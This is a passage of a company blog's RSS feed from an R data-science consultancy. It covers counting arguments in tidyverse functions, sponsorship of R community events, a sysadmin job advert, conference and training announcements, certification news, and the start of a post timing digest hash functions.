&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(package, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # Groups: package [26]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package arg n&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 ggplot2 data 103&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 purrr .x 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 dplyr x 83&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 rlang ... 64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 readr locale 44&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 lubridate ... 35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 stringr pattern 23&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 dbplyr x 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 httr ... 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 tidyr ... 18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # … with 16 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So you can see that &lt;code&gt;data&lt;/code&gt; is the most common argument within {ggplot2}, &lt;code&gt;.x&lt;/code&gt; is the most common argument within {purrr} and so on…&lt;/p&gt;
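&lt;p&gt;As a minimal sketch of the building blocks used above, the snippet below looks up a single function and extracts its argument names. The choice of &lt;code&gt;sd()&lt;/code&gt; and &lt;code&gt;sum()&lt;/code&gt; and the variable name &lt;code&gt;f&lt;/code&gt; are ours, purely for illustration. It also shows why the call is wrapped in &lt;code&gt;args()&lt;/code&gt;: primitives such as &lt;code&gt;sum()&lt;/code&gt; have no formals of their own.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Look up a function by name inside an attached package
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;f = get(&amp;#34;sd&amp;#34;, pos = &amp;#34;package:stats&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# formalArgs() returns the argument names as a character vector
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;formalArgs(args(f))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## [1] &amp;#34;x&amp;#34;     &amp;#34;na.rm&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# For a primitive, formalArgs() on its own returns NULL
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;formalArgs(sum)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## NULL
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Wrapping in args() recovers the argument list
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;formalArgs(args(sum))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## [1] &amp;#34;...&amp;#34;   &amp;#34;na.rm&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;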
&lt;p&gt;That’s it for this blog post. Hope you’ve enjoyed it!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sponsorship: SatRdays and useR Groups</title><link>https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/</link><pubDate>Thu, 05 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="satrdays"&gt;SatRdays&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://satrdays.org/" rel="external"&gt;SatRdays&lt;/a&gt; are great. Low cost R events, held around the world. What&amp;rsquo;s not to love!&lt;/p&gt;
&lt;p&gt;For the last year, we have been offering automatic sponsorship for all &lt;a href="https://satrdays.org" rel="external"&gt;SatRday&lt;/a&gt; events. All the organisers have to do is complete a quick &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;questionnaire&lt;/a&gt; and the money is sent on it&amp;rsquo;s way. So far we have sponsored seven events!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://kampala2019.satrdays.org/" rel="external"&gt;Kampal 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2019.satrdays.org" rel="external"&gt;Newcastle 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nairobi2019.satrdays.org/" rel="external"&gt;Nairobi 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cardiff2019.satrdays.org" rel="external"&gt;Cardiff 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://berlin2019.satrdays.org/" rel="external"&gt;Berlin 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://abidjan2020.satrdays.org/" rel="external"&gt;Abidjan 2020&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2020.satrdays.org" rel="external"&gt;Newcastle 2020&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-sponsorship-satrdays-and-user-groups"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="user--r-ladies-groups"&gt;useR / R-Ladies Groups&lt;/h3&gt;
&lt;p&gt;Now that we&amp;rsquo;ve tested the water with SatRday sponsorship, we thought we would do the same with useR groups. Due to the large number of useR groups (there are over &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;400&lt;/a&gt;), we can&amp;rsquo;t open this up to the world (sorry). To start with, we plan on offering sponsorship to twenty groups from Europe. Hopefully, we can increase this number.&lt;/p&gt;
&lt;p&gt;So if you want sponsorship for your group, just complete this &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;quick form&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job: Junior Systems Administrator (with a focus on R/Python)</title><link>https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/</link><pubDate>Thu, 17 Oct 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com" rel="external" title="Jumping Rivers"&gt;Jumping Rivers&lt;/a&gt; is a data science consultancy company focused on R and Python. We work across industries and throughout the world. We offer a mixture of training, modelling, and infrastructure support. Jumping Rivers is an &lt;a href="https://www.jumpingrivers.com/posit/" rel="external" title="Posit Full Service Certified Partner"&gt;Posit Full Service Certified Partner&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This role is suitable for anyone interested in deploying (Linux-based) data science services and contains two main elements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Client facing:&lt;/strong&gt; assess virtual servers &amp;amp; services. Identify potential issues or improvements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Internal:&lt;/strong&gt; Everyone(!) at Jumping Rivers uses Linux. Provide support on setting-up systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Depending on the interests of the applicant, getting involved with training is also a possibility.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; Jumping Rivers is based in &lt;a href="https://en.wikipedia.org/wiki/Newcastle_upon_Tyne" rel="external" title="Newcastle upon Tyne"&gt;Newcastle upon Tyne&lt;/a&gt;. However, half of the team are remote (Leeds, Lancaster, Edinburgh). To make remote working a possibility, you need a) a good internet connection and b) to be within a few hours of (train) travel to London or Edinburgh.&lt;/p&gt;
&lt;h3 id="essential-technical-requirements"&gt;Essential technical requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Linux server administration&lt;/li&gt;
&lt;li&gt;Shell scripting&lt;/li&gt;
&lt;li&gt;Version control&lt;/li&gt;
&lt;li&gt;Relevant technical degree or equivalent experience (Sciences, server administration)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="bonus"&gt;Bonus&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Experience with R, Python, HTML/CSS/JS&lt;/li&gt;
&lt;li&gt;Docker stack deployment (e.g., Docker Compose, Terraform, Packer)&lt;/li&gt;
&lt;li&gt;Continuous Integration and Deployment (e.g., GitLab CI, Travis)&lt;/li&gt;
&lt;li&gt;Authentication services (e.g., Active Directory, SAML, LDAP, OAuth)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="individual-responsibilities"&gt;Individual responsibilities&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Time management&lt;/li&gt;
&lt;li&gt;Communication (video chat and email)&lt;/li&gt;
&lt;li&gt;Travel to client’s location as required&lt;/li&gt;
&lt;li&gt;Work independently&lt;/li&gt;
&lt;li&gt;Work as part of a team&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="future-role-opportunities"&gt;Future role opportunities&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Opportunity to develop new orchestration and deployment pipelines for use in Artificial Intelligence and Machine Learning workloads.&lt;/li&gt;
&lt;li&gt;Maintaining remote Linux services both cloud-based and internal VPS&lt;/li&gt;
&lt;li&gt;Designing bespoke infrastructure solutions for clients&lt;/li&gt;
&lt;li&gt;Training: develop and deliver courses&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To discuss this role, please email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt;. To apply, please send a short covering letter and CV. Please use &amp;ldquo;Junior Systems Administrator&amp;rdquo; as the subject.&lt;/p&gt;
&lt;p&gt;Closing date: 14th November&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-junior-systems-administrator-with-a-focus-on-r-python/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Catch us at these conferences!</title><link>https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/</link><pubDate>Mon, 09 Sep 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we always want to branch out into the data science community, and so this year we&amp;rsquo;re going to quite a few conferences in the autumn. You can catch us at:&lt;/p&gt;
&lt;h3 id="gss-government-statistical-service-conference---edinburgh"&gt;GSS (Government Statistical Service) Conference - Edinburgh&lt;/h3&gt;
&lt;p&gt;From the 1-2 October, our very own &lt;em&gt;Esther Gillespie&lt;/em&gt; (CEO) and &lt;em&gt;Seb Mellor&lt;/em&gt; (Data Engineer) will be attending the GSS conference in Edinburgh. If you see them, feel free to chat or ask for some merch! Unfortunately, there are no tickets available for this one.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-catch-us-at-these-conferences"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="earl---london"&gt;EARL - London&lt;/h3&gt;
&lt;p&gt;EARL London boasts a very strong line-up of speakers, from Sainsbury&amp;rsquo;s to Stack Overflow. We&amp;rsquo;re sponsoring this one so expect a big Jumping Rivers presence. We&amp;rsquo;ve got Esther, &lt;em&gt;Colin Gillespie&lt;/em&gt; (Project Manager) and &lt;em&gt;Rhian Davies&lt;/em&gt; (Data Scientist) attending.&lt;/p&gt;
&lt;p&gt;From the 10-12 September you&amp;rsquo;ll be able to catch the three of them heading up our stall, where you can pop by for a chat or for a coaster!&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve still not grabbed yourself a &lt;a href="https://earlconf.com/#tickets" rel="external"&gt;ticket&lt;/a&gt;, you&amp;rsquo;ll have to do it pretty soon!&lt;/p&gt;
&lt;h3 id="why-r---warsaw"&gt;Why R? - Warsaw&lt;/h3&gt;
&lt;p&gt;In just a couple of weeks&amp;rsquo; time, Jumping Rivers will be going international! Four of our team will be crossing borders into Warsaw for the annual &lt;a href="http://whyr.pl/2019/" rel="external"&gt;Why R?&lt;/a&gt; conference. If you like the sound of it, grab yourself &lt;a href="https://evenea.pl/event/whyr2019/?lang=en" rel="external"&gt;a ticket&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;Who&amp;rsquo;s going? Myself (&lt;em&gt;Theo Roe&lt;/em&gt;, Data Scientist), Colin, &lt;em&gt;Roman Popat&lt;/em&gt; (Data Scientist) and &lt;em&gt;Jack Walton&lt;/em&gt; (Data Scientist) will be attending. If you see us, feel free to stop us for a chat, and grab one of our infamous Jumping Rivers coasters!&lt;/p&gt;
&lt;p&gt;As a treat, I&amp;rsquo;m doing a workshop on Friday morning titled &lt;em&gt;&lt;strong&gt;&amp;ldquo;Shiny basics&amp;rdquo;&lt;/strong&gt;&lt;/em&gt;. I&amp;rsquo;m also talking in the 10-11:20am Saturday &lt;strong&gt;Shiny&lt;/strong&gt; session about a recent project we took on at Jumping Rivers, titled &lt;em&gt;Improving the communication of environmental data using &lt;strong&gt;Shiny&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;You can catch Colin talking in the Sunday 15:05-16:05 &lt;strong&gt;Vision 1&lt;/strong&gt; session. His talk is titled &lt;em&gt;Hacking R as a script kiddie&lt;/em&gt;. It covers the relatively easy hacks that can be performed to access systems as data science moves away from local machines to the cloud.&lt;/p&gt;
&lt;p&gt;Thanks, and hope to see you there!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/catch-us-at-these-conferences/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>We're RStudio Trainers!</title><link>https://www.jumpingrivers.com/blog/rstudio-certified-trainers/</link><pubDate>Fri, 16 Aug 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rstudio-certified-trainers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rstudio-certified-trainers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rstudio-certified-trainers/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="were-rstudio-trainers"&gt;We&amp;rsquo;re RStudio Trainers!&lt;/h1&gt;
&lt;p&gt;Big news. RStudio recently started certifying trainers in three areas: the tidyverse, Shiny and teaching. To be certified to teach a topic you have to pass the exam for that topic and the teaching exam.&lt;/p&gt;
&lt;p&gt;Even &lt;strong&gt;&lt;em&gt;bigger&lt;/em&gt;&lt;/strong&gt; news. Four of your lovely Jumping Rivers trainers are now certified to teach at least one topic! Check out the &lt;a href="https://rstd.io/trainers" rel="external" title="RStudio certified trainers page"&gt;RStudio certified trainers page&lt;/a&gt; to see me (Theo Roe), Rhian Davies, Colin Gillespie and Roman Popat in action!&lt;/p&gt;
&lt;p&gt;P.S. whilst we&amp;rsquo;ve got you, if you want to learn the tidyverse or shiny see
&lt;img class="image-center" src="small-RStudio-logos-Shiny.jpg" style="width:300px; class:image-center"&gt;&lt;/p&gt;
&lt;img class="image-center" src="tidyverse-logo.png" style="width:300px; class:image-center"&gt;
&lt;img class="image-center" src="rstudio-logo.png" style="width:300px; class:image-center"&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rstudio-certified-trainers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Upcoming R courses with Jumping Rivers</title><link>https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/</link><pubDate>Sun, 04 Aug 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;You&amp;rsquo;ll be pleased to know that Jumping Rivers are running R training courses up and down the UK, in London, Newcastle, Belfast and Edinburgh. I&amp;rsquo;ve put together a quick summary of the courses available through to the end of the year. They are sorted by place, then date. You can find the booking links and more detail over at &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;our courses page.&lt;/a&gt; Don&amp;rsquo;t be afraid to get in contact if you have any questions!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-london-uk-r-courses"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="london"&gt;London&lt;/h2&gt;
&lt;h3 id="1212---advanced-programming-in-r"&gt;12/12 - Advanced Programming in R&lt;/h3&gt;
&lt;p&gt;This is a two-day intensive course on advanced R programming. The training course will not only cover advanced R programming techniques, such as S3/S4 objects, reference classes and function closures, but will also spend significant time discussing why and where these methods are used. The course will be a mixture of lectures and computer practicals. By the end of the course, participants will be able to use OOP within their own code.&lt;/p&gt;
&lt;h2 id="newcastle"&gt;Newcastle&lt;/h2&gt;
&lt;h3 id="212---412---rapid-reporting-for-analysts-an-introduction-to-r-programming-through-to-reporting-in-three-days"&gt;2/12 - 4/12 - Rapid reporting for analysts: An Introduction to R programming through to reporting in three days&lt;/h3&gt;
&lt;p&gt;This course aims to take each individual through the fundamental approach to using R programming in their current role, ensuring that attendees build confidence on where and how to start when they get back to their desks. By the end of the course the individual should have already introduced some automation and will be working towards automating all of their reports. Our experience shows that analysts who set up a reproducible report save between 20% and 80% of the time spent on the task.&lt;/p&gt;
&lt;h2 id="belfast"&gt;Belfast&lt;/h2&gt;
&lt;h3 id="29---mastering-the-tidyverse-data-carpentry"&gt;2/9 - Mastering the Tidyverse (Data Carpentry)&lt;/h3&gt;
&lt;p&gt;The {tidyverse} is essential for any statistician or data scientist who deals with data on a day-to-day basis. By focusing on small key tasks, the {tidyverse} suite of packages removes the pain of data manipulation. The {tidyverse} allows you to&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Import data from databases and data sources with ease&lt;/li&gt;
&lt;li&gt;Remove the pain of data cleaning&lt;/li&gt;
&lt;li&gt;Start understanding that data by transforming it, visualising it with imagery and modelling it&lt;/li&gt;
&lt;li&gt;Communicate your findings throughout your organisation securely and simply with apps, documents or plots&lt;/li&gt;
&lt;li&gt;Make business decisions based on accurate data&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This training course covers key aspects of the {tidyverse}, including {dplyr}, {lubridate}, {tidyr}, {stringr} and tibbles.&lt;/p&gt;
&lt;h3 id="39---intro-to-r"&gt;3/9 - Intro to R&lt;/h3&gt;
&lt;p&gt;This is a one-day intensive course on R and assumes no prior knowledge. By the end of the course, participants will be able to import, summarise and plot their data. At each step, we avoid using &amp;ldquo;magic code&amp;rdquo;, and stress the importance of understanding what R is doing.&lt;/p&gt;
&lt;h2 id="edinburgh"&gt;Edinburgh&lt;/h2&gt;
&lt;h3 id="410---intro-to-r"&gt;4/10 - Intro to R&lt;/h3&gt;
&lt;p&gt;See above description&lt;/p&gt;
&lt;h3 id="1110---programming-with-r"&gt;11/10 - Programming with R&lt;/h3&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h3 id="1810---introduction-to-r"&gt;18/10 - Introduction to R&lt;/h3&gt;
&lt;p&gt;See above description&lt;/p&gt;
&lt;h3 id="2510---mastering-the-tidyverse-data-carpentry"&gt;25/10 - Mastering the Tidyverse (Data Carpentry)&lt;/h3&gt;
&lt;p&gt;See above description&lt;/p&gt;
&lt;h3 id="111---advanced-graphics-with-r"&gt;1/11 - Advanced Graphics with R&lt;/h3&gt;
&lt;p&gt;This is a one-day intensive course on advanced graphics with R. The standard plotting commands in R are known as the base graphics, but they are starting to show their age. In this course, we cover more advanced graphics packages, in particular {ggplot2}. The {ggplot2} package can create advanced and informative graphics. This training course stresses understanding, not just one-off R scripts. By the end of the session, participants will be familiar with themes, scales and facets, as well as the wider {ggplot2} world of packages.&lt;/p&gt;
&lt;h3 id="811---statistical-modelling-with-r"&gt;8/11 - Statistical Modelling with R&lt;/h3&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. This course covers the fundamental modelling techniques. We begin the day by revising hypothesis tests, before moving on to ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/upcoming-r-courses-with-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Timing hash functions with the bench package</title><link>https://www.jumpingrivers.com/blog/digest-timings-bench-package/</link><pubDate>Tue, 21 May 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/digest-timings-bench-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/digest-timings-bench-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/digest-timings-bench-package/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This blog post has two goals:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Investigate the {bench} package for timing R functions&lt;/li&gt;
&lt;li&gt;Consequently explore the different algorithms in the {digest} package using {bench}&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="what-is-digest"&gt;What is {digest}?&lt;/h3&gt;
&lt;p&gt;The &lt;a href="http://dirk.eddelbuettel.com/code/digest.html" rel="external"&gt;{digest}&lt;/a&gt; package provides a hash function to summarise R objects. Standard hashes are available, such as md5, crc32, sha-1, and sha-256.&lt;/p&gt;
&lt;p&gt;The key function in the package is &lt;code&gt;digest()&lt;/code&gt;, which applies a cryptographic hash function to arbitrary R objects. By default, objects are serialized internally and then hashed using &lt;code&gt;md5&lt;/code&gt;. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1234&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;37c3db57937cc950b924e1dccb76f051&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;digest&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1234&lt;/span&gt;, algo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sha256&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;01b3680722a3f3a3094c9845956b6b8eba07f0b938e6a0238ed62b8b4065b538&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The {digest} package is fairly popular and has a large number of reverse dependencies&lt;/p&gt;
